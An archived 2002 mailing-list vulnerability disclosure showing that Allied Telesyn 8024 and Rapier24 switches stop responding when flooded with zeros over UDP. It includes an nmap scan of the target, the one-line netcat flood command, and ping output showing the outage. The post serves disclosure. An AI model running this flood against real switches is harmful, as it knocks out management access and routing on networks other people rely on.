Allied Telesyn switches & routers vulnerability

From: Oleg A. Lebedev (techdirat_private)
Date: Wed Nov 20 2002 - 06:13:04 PST

Next message: Seth Bromberger: "UPDATE: Linksys router vulnerability (add'l models affected)"

Previous message: K. K. Mookhey: "[Full-Disclosure] Buffer Overflow in iSMTP Gateway"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello, all

The problem: Zero stream DoS switch!

We have tested switches of Allied Telesyn, 8024 and Rapier24. We have
installed the latest firmware from AT site. 

Testing:

1. Scan for open ports on switch (assume switch address 192.168.0.13):

nmap -v -sT 192.168.0.13
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Host  (192.168.0.103) appears to be up ... good.
Initiating Connect() Scan against  (192.168.0.103)
Adding TCP port 23 (state open).
Adding TCP port 80 (state open).
The Connect() Scan took 4 seconds to scan 1542 ports. Interesting ports
on  (192.168.0.103): (The 1540 ports scanned but not shown below are in
state: closed)
Port       State       Service
23/tcp     open        telnet
80/tcp     open        http
Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds

2. Send stream of zero to open port or any port in case 8024:

cat /dev/zero | nc -u 192.168.0.13 Open_Port &

Pinging 192.168.0.103 with 32 bytes of data:

Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time=16ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30
Request timed out. // Start sending zero stream: cat /dev/zero | nc -u
192.168.0.103 6789 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. 
Request timed out. // Stop sending zero stream
Reply from 192.168.0.103: bytes=32 time=203ms TTL=30 
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 
Reply from 192.168.0.103: bytes=32 time<10ms TTL=30

So, in case of 8024 it stops responding on management interface and in
case Rapier24 it stops management interface access and routing also.

The bug was reported to Allied Telesyn in July...



Best Regards, Oleg A. Lebedev
"Matrix Network Solutions" CIO

Next message: Seth Bromberger: "UPDATE: Linksys router vulnerability (add'l models affected)"
Previous message: K. K. Mookhey: "[Full-Disclosure] Buffer Overflow in iSMTP Gateway"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Nov 24 2002 - 12:51:49 PST